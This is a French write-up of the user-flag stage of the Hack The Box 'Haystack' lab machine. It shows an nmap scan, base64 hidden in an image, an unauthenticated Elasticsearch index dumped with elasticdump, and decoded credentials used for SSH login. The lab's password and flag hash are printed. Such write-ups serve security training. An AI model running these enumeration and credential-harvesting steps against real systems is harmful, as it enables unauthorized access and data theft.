1- User.txt
root@Host-001:~# nmap -A 10.10.10.115
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-15 20:51 CEST
Nmap scan report for 10.10.10.115
Host is up (0.018s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 2a:8d:e2:92:8b:14:b6:3f:e4:2f:3a:47:43:23:8b:2b (RSA)
| 256 e7:5a:3a:97:8e:8e:72:87:69:a3:0d:d1:00:bc:1f:09 (ECDSA)
|_ 256 01:d2:59:b2:66:0a:97:49:20:5f:1c:84:eb:81:ed:95 (ED25519)
80/tcp open http nginx 1.12.2
|_http-server-header: nginx/1.12.2
|_http-title: Site doesn't have a title (text/html).
9200/tcp open http nginx 1.12.2
| http-methods:
|_ Potentially risky methods: DELETE
|_http-server-header: nginx/1.12.2
|_http-title: Site doesn't have a title (application/json; charset=UTF-8).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.18 (92%), Linux 3.2 - 4.9 (92%), Crestron XPanel control system (90%), Linux 3.16 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 17.07 ms 10.10.14.1
2 18.55 ms 10.10.10.115
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.10 seconds
Les ports 22 80 et 9200 sont ouverts
Sur le port 80 on trouve une image. Téléchargeons l’image et regardons si il y a des chaines de charactères:
root@Host-001:~/Bureau# strings needle.jpg
(...)
bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg==
Décodons: https://www.base64decode.org/<
Résultat: la aguja en el pajar es “clave”
Ce qui signifie: the needle in the haystack is “key”
Regardons ce qu’il y a sur le port 9200 http://10.10.10.115:9200/
On tombe sur un DB. Le cluster_name est elasticsearch
On google et on comprend que le site utilise Elasticsearch (même logo): https://en.wikipedia.org/wiki/Elasticsearch
Tentons de chercher ‘needle’ en vue du base64 décodé:
http://10.10.10.115:9200/_search?q=%27needle%27
On trouve:
(...)
_index "quotes"
_type "quote"
_id "2"
_score 5.427053
_source
quote "There's a needle in this haystack, you have to search for it"
Dumpons la DB avec elasticdump: https://github.com/taskrabbit/elasticsearch-dump
root@Host-001:~/Bureau/elasticsearch-dump/bin# ./elasticdump --input=http://10.10.10.115:9200/quotes/ --output=dump
En analysant minutieusement le dump on trouve 2 ligne avec du base 64:
{"_index":"quotes","_type":"quote","_id":"111","_score":1,"_source":{"quote":"Esta clave no se puede perder, la guardo aca: cGFzczogc3BhbmlzaC5pcy5rZXk="}}
Décodé: pass: spanish.is.key
{"_index":"quotes","_type":"quote","_id":"45","_score":1,"_source":{"quote":"Tengo que guardar la clave para la maquina: dXNlcjogc2VjdXJpdHkg "}}
Décodé: user: security
root@Host-001:~# ssh security@10.10.10.115
The authenticity of host '10.10.10.115 (10.10.10.115)' can't be established.
ECDSA key fingerprint is SHA256:ihn2fPA4jrn1hytN0y9Z3vKpIKuL4YYe3yuESD76JeA.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.115' (ECDSA) to the list of known hosts.
security@10.10.10.115's password:
Last failed login: Tue Oct 15 19:27:55 -03 2019 from 10.10.14.18 on ssh:notty
There was 1 failed login attempt since the last successful login.
Last login: Wed Feb 6 20:53:59 2019 from 192.168.2.154
[security@haystack ~]$ ls
user.txt
[security@haystack ~]$ cat user.txt
04d18bc79dac1d4d48ee0a940c8eb929
[security@haystack ~]$
Poursuivez avec :
This work is licensed under a Creative Commons Attribution 4.0 International License.